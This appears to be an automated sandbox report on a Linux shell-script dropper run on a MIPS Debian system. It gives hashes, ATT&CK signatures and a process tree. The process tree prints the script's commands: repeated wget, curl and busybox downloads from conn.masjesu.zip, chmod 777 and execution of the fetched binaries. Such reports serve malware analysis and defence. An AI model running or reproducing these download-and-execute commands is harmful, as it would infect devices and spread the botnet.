9e91170bac0c57328a24acedfc0276a02ab5986a57c5d212539d033a9422a4ba

Analysis

max time kernel
103s
max time network
106s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
21-11-2024 07:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9e91170bac0c57328a24acedfc0276a02ab5986a57c5d212539d033a9422a4ba.sh
Size

10KB
MD5

23622b271af5066134037f2f704d5e77
SHA1

4a408a39b8e07d57ed50e3d57d94a3ead898d4db
SHA256

9e91170bac0c57328a24acedfc0276a02ab5986a57c5d212539d033a9422a4ba
SHA512

09d6105fd7dc1686bbbe1b15d7d9e97d7e0dde3857755adb4bb1e77d960d6d0a7a0c78a78440353426be8e0fcd37e73f632c2f2e46894d5a0a5fef25555712f8
SSDEEP

96:YlFcLn7bnin6nRKWVlLnuLb3IyKY99Ff9f9fHsnbBL79797iDcLfzV0UeO65R4Cs:L4l8xSBTg

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
819	chmod
884	chmod
912	chmod
919	chmod
982	chmod
809	chmod
891	chmod
905	chmod
926	chmod
1003	chmod
736	chmod
752	chmod
849	chmod
947	chmod
954	chmod
870	chmod
898	chmod
968	chmod
996	chmod
863	chmod
989	chmod
877	chmod
940	chmod
961	chmod
743	chmod
786	chmod
933	chmod
975	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
925	busybox
958	curl
979	curl
880	wget
869	busybox
876	busybox
902	curl
909	curl
930	curl
939	busybox
971	wget
720	curl
894	wget
932	busybox
936	wget
951	curl
985	wget
986	curl
770	curl
866	wget
867	curl
874	curl
881	curl
929	wget
965	curl
974	busybox
821	rm
1005	rm
988	busybox
793	wget
873	wget
916	curl
957	wget
960	busybox
758	wget
749	busybox
815	wget
911	busybox
923	curl
746	wget
953	busybox
981	busybox
895	curl
779	busybox
844	busybox
901	wget
1000	curl
713	wget
995	busybox
747	curl
808	busybox
816	curl
820	k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
908	wget
922	wget
964	wget
967	busybox
740	curl
993	curl
897	busybox
944	curl
978	wget
890	busybox
950	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	curl
File opened for modification	/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	curl
File opened for modification	/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	curl
File opened for modification	/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	curl
File opened for modification	/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	curl
File opened for modification	/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	curl
File opened for modification	/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	curl
File opened for modification	/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	curl
File opened for modification	/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	curl
File opened for modification	/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	curl
File opened for modification	/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	curl
File opened for modification	/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	curl
File opened for modification	/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	curl
File opened for modification	/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	curl
File opened for modification	/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	curl
File opened for modification	/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	curl
File opened for modification	/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	curl
File opened for modification	/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	curl
File opened for modification	/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	curl
File opened for modification	/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	curl
File opened for modification	/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	curl
File opened for modification	/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	curl
File opened for modification	/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	curl
File opened for modification	/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	curl
File opened for modification	/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	curl
File opened for modification	/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	curl
File opened for modification	/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	curl
File opened for modification	/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	curl

/tmp/9e91170bac0c57328a24acedfc0276a02ab5986a57c5d212539d033a9422a4ba.sh
/tmp/9e91170bac0c57328a24acedfc0276a02ab5986a57c5d212539d033a9422a4ba.sh
1⤵
PID:702
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:706
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - System Network Configuration Discovery
  PID:713
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:720
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:732
- /bin/chmod
  chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  ./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Executes dropped EXE
  PID:737
- /bin/rm
  rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:738
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:739
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:742
- /bin/chmod
  chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  ./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Executes dropped EXE
  PID:744
- /bin/rm
  rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:745
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - System Network Configuration Discovery
  PID:746
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:747
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - System Network Configuration Discovery
  PID:749
- /bin/chmod
  chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  ./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Executes dropped EXE
  PID:754
- /bin/rm
  rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:757
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - System Network Configuration Discovery
  PID:758
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:770
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - System Network Configuration Discovery
  PID:779
- /bin/chmod
  chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - File and Directory Permissions Modification
  PID:786
- /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  ./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Executes dropped EXE
  PID:787
- /bin/rm
  rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:792
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - System Network Configuration Discovery
  PID:793
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:805
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - System Network Configuration Discovery
  PID:808
- /bin/chmod
  chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  ./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Executes dropped EXE
  PID:810
- /bin/rm
  rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:814
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:815
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:816
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  PID:818
- /bin/chmod
  chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:820
- /bin/rm
  rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:821
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:822
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:823
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - System Network Configuration Discovery
  PID:844
- /bin/chmod
  chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - File and Directory Permissions Modification
  PID:849
- /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  ./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Executes dropped EXE
  PID:851
- /bin/rm
  rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:854
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:855
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:860
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:862
- /bin/chmod
  chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - File and Directory Permissions Modification
  PID:863
- /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  ./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Executes dropped EXE
  PID:864
- /bin/rm
  rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:865
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - System Network Configuration Discovery
  PID:866
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:867
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - System Network Configuration Discovery
  PID:869
- /bin/chmod
  chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - File and Directory Permissions Modification
  PID:870
- /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  ./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Executes dropped EXE
  PID:871
- /bin/rm
  rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:872
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - System Network Configuration Discovery
  PID:873
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:874
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - System Network Configuration Discovery
  PID:876
- /bin/chmod
  chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  ./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Executes dropped EXE
  PID:878
- /bin/rm
  rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:879
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - System Network Configuration Discovery
  PID:880
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:881
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:883
- /bin/chmod
  chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - File and Directory Permissions Modification
  PID:884
- /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  ./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Executes dropped EXE
  PID:885
- /bin/rm
  rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:886
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:887
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - System Network Configuration Discovery
  PID:890
- /bin/chmod
  chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Executes dropped EXE
  PID:892
- /bin/rm
  rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:893
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - System Network Configuration Discovery
  PID:894
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:895
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - System Network Configuration Discovery
  PID:897
- /bin/chmod
  chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  ./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Executes dropped EXE
  PID:899
- /bin/rm
  rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:900
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - System Network Configuration Discovery
  PID:901
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:902
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:904
- /bin/chmod
  chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - File and Directory Permissions Modification
  PID:905
- /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  ./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/rm
  rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:907
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - System Network Configuration Discovery
  PID:908
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:909
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - System Network Configuration Discovery
  PID:911
- /bin/chmod
  chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - File and Directory Permissions Modification
  PID:912
- /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  ./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Executes dropped EXE
  PID:913
- /bin/rm
  rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:914
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:915
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:916
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:918
- /bin/chmod
  chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  ./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:921
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - System Network Configuration Discovery
  PID:922
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - System Network Configuration Discovery
  PID:925
- /bin/chmod
  chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - File and Directory Permissions Modification
  PID:926
- /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  ./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Executes dropped EXE
  PID:927
- /bin/rm
  rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:928
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - System Network Configuration Discovery
  PID:929
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:930
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - System Network Configuration Discovery
  PID:932
- /bin/chmod
  chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - File and Directory Permissions Modification
  PID:933
- /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  ./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Executes dropped EXE
  PID:934
- /bin/rm
  rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:935
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - System Network Configuration Discovery
  PID:936
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:937
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - System Network Configuration Discovery
  PID:939
- /bin/chmod
  chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  ./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Executes dropped EXE
  PID:941
- /bin/rm
  rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:942
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:943
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:944
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:946
- /bin/chmod
  chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - File and Directory Permissions Modification
  PID:947
- /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Executes dropped EXE
  PID:948
- /bin/rm
  rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:949
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - System Network Configuration Discovery
  PID:950
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:951
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - System Network Configuration Discovery
  PID:953
- /bin/chmod
  chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - File and Directory Permissions Modification
  PID:954
- /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  ./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Executes dropped EXE
  PID:955
- /bin/rm
  rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:956
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - System Network Configuration Discovery
  PID:957
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:958
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
